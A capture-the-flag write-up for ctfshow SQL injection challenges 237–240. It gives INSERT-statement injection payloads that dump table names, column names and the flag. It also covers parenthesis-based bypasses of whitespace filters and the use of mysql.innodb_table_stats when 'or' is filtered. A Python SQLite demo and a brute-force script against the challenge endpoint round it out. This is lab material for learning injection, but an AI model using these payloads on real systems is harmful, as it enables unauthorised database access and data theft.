237 No filtering

Source

  $sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";

Note

The hard part of this challenge is finding the injection point. I kept complaining earlier that I could not find it; in fact, just add one record through the web page, capture the request with Burp Suite, and you will see that the page doing the insert is api/insert.php. The username value is interpolated straight into the INSERT above, so a payload of the form 1',(subquery))# closes the username string, supplies the subquery result as the second value (the pass column), closes the VALUE tuple, and comments out the remainder of the statement; the result of the subquery is therefore stored as the pass of the newly inserted row.

  username=1',(select group_concat(table_name) from information_schema.tables where table_schema=database()))#&password=1
  username=123',(select group_concat(column_name) from information_schema.columns where table_schema=database()))#&password=123
  username=123',(select group_concat(flagass23s3) from flag))#&password=123

238 Space filtered (bypass)

The challenge says it only adds a space filter on top of the previous one, but in practice /**/, %09 and %0c are filtered as well.
Parentheses can be used instead: every place a space would separate tokens, wrap the following token in ( ), so the payload contains no whitespace at all.

  username=1',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))#&password=1
  username=1',(select(group_concat(column_name))from(information_schema.columns)where(table_schema=database())))#&password=1
  username=1',(select(group_concat(flag))from(flagb)))#&password=1
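The following is an added example, not part of the original writeup, showing what happens to the INSERT from 237 when the payloads above are interpolated into it, and why the parenthesised form from 238 survives a whitespace filter. It uses an in-memory SQLite database as a stand-in for the challenge's MySQL server, so three things are adapted: SQLite requires VALUES where MySQL also accepts VALUE, SQLite's line comment is -- rather than #, and table names are read from sqlite_master instead of information_schema. The schema, the flag table and its contents are constructed for the demo and are not the challenge's data.

```python
import sqlite3

# Constructed stand-in schema for the demo (not the challenge's real tables or data):
# the user table from the challenge source plus a flag table holding a made-up flag.
SCHEMA = """
CREATE TABLE ctfshow_user(username TEXT, pass TEXT);
CREATE TABLE flag(flag TEXT);
INSERT INTO flag VALUES ('ctfshow{demo_flag}');
"""

# What the 238 challenge rejects according to the writeup: space, /**/, %09 (tab), %0c (form feed).
BLOCKED_238 = (" ", "/**/", "\t", "\x0c")

# 237-style payloads (whitespace allowed). MySQL's '#' comment is written as SQLite's '--'.
P237_TABLES = "1',(select group_concat(name) from sqlite_master where type='table'))--"
P237_FLAG = "1',(select group_concat(flag) from flag))--"

# 238-style payloads: every separator replaced by parentheses, no whitespace anywhere.
P238_TABLES = "1',(select(group_concat(name))from(sqlite_master)where(type='table')))--"
P238_FLAG = "1',(select(group_concat(flag))from(flag)))--"


def build_insert(username, password):
    """Mirror the PHP string interpolation from the challenge source.
    Only VALUES (SQLite) differs from the original VALUE (MySQL synonym)."""
    return f"insert into ctfshow_user(username,pass) values('{username}','{password}');"


def passes_238_filter(payload):
    """True if the payload contains none of the separators the 238 filter blocks."""
    return not any(tok in payload for tok in BLOCKED_238)


def run_payload(username, password="123"):
    """Interpolate the payload like the vulnerable PHP does, execute the resulting
    INSERT against a fresh in-memory database, and return (query, pass_column) of
    the row that was inserted. The subquery result lands in the pass column because
    the payload supplies it as the second value and comments out the real password."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    query = build_insert(username, password)
    con.execute(query)
    row = con.execute(
        "SELECT pass FROM ctfshow_user ORDER BY rowid DESC LIMIT 1"
    ).fetchone()
    con.close()
    return query, row[0]


if __name__ == "__main__":
    for label, payload in [
        ("237 tables", P237_TABLES),
        ("237 flag", P237_FLAG),
        ("238 tables", P238_TABLES),
        ("238 flag", P238_FLAG),
    ]:
        query, leaked = run_payload(payload)
        status = "passes" if passes_238_filter(payload) else "BLOCKED by"
        print(f"[{label}] {status} the 238 filter")
        print("  query:      ", query)
        print("  pass column:", leaked)
```

Running it prints the fully interpolated statement for each payload; the 237 payloads leak the table list and the flag but are rejected by the 238 filter because of their spaces, while the parenthesised 238 payloads pass the filter and leak exactly the same data.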

239 No-column-name injection

This one filters or and is otherwise similar to yesterday's challenge. Because "information_schema" contains "or", the usual table enumeration no longer works;
mysql.innodb_table_stats (columns database_name and table_name) can be used instead to dump the table names.

  username=1',(select(group_concat(table_name))from(mysql.innodb_table_stats)where(database_name=database())))#&password=1

With the table name in hand, the next step is to try fetching the flag without knowing the column name.
During testing, however, * turned out to be filtered as well, so the no-column-name approach fails here.

240

Nothing much to say here: brute-force the table name directly. The payload is the same parenthesised subquery as in 238, and the candidate table names are flag followed by five characters drawn from a and b.

  import itertools
  import requests

  url = "http://702ce6b4-126b-4a22-b0c6-294a7755bf9d.challenge.ctf.show/api/insert.php"
  # Same shape as the 238 payload: the subquery result is stored in the pass column of the
  # inserted row; only the table name (the {} placeholder) is unknown.
  username = "1',(select(group_concat(flag))from({})))#"

  # Try every table name of the form "flag" + five characters from {a, b} (32 candidates).
  for a, b, c, d, e in itertools.product('ab', repeat=5):
      table_name = "flag" + a + b + c + d + e
      data = {
          'username': username.format(table_name),
          'password': 123
      }
      r = requests.post(url=url, data=data)